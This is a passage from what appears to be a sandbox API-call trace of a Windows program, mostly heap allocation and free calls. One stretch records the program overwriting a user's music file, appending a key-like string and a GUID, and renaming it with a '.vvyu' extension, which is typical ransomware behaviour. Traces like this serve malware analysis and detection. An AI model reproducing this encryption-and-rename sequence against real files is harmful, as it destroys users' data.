hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b48 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ba8 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b48 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0199.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b90 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adeaa0 | out: hHeap=0x2c0000) returned 1 [0199.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0199.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.742] WriteFile (in: hFile=0x584, lpBuffer=0x2afb168*, nNumberOfBytesToWrite=0xd0ea, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2afb168*, lpNumberOfBytesWritten=0x2f9fb14*=0xd0ea, lpOverlapped=0x0) returned 1 [0199.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2afb168 | out: hHeap=0x2c0000) returned 1 [0199.743] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd0ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.743] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.745] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.746] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.746] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.746] CloseHandle (hObject=0x584) returned 1 [0199.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x2a245f0 [0199.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x2af3f88 [0199.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.748] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\xryUj16QF_9DxMTZ1QMq.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\xryuj16qf_9dxmtz1qmq.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\xryUj16QF_9DxMTZ1QMq.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\xryuj16qf_9dxmtz1qmq.m4a.vvyu")) returned 1 [0199.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.750] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381bd0 | out: hHeap=0x2c0000) returned 1 [0199.752] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13d32bf0, ftCreationTime.dwHighDateTime=0x1d896f5, ftLastAccessTime.dwLowDateTime=0xeec37fc0, ftLastAccessTime.dwHighDateTime=0x1d89ad9, ftLastWriteTime.dwLowDateTime=0xeec37fc0, ftLastWriteTime.dwHighDateTime=0x1d89ad9, nFileSizeHigh=0x0, nFileSizeLow=0xd0ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xryUj16QF_9DxMTZ1QMq.m4a", cAlternateFileName="XRYUJ1~1.M4A")) returned 0 [0199.752] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0199.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8f50 | out: hHeap=0x2c0000) returned 1 [0199.753] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0199.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0199.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311e20 | out: hHeap=0x2c0000) returned 1 [0199.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bb08 | out: hHeap=0x2c0000) returned 1 [0199.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0199.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0199.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f8628 | out: hHeap=0x2c0000) returned 1 [0199.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0199.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8f50 [0199.756] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0199.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.777] 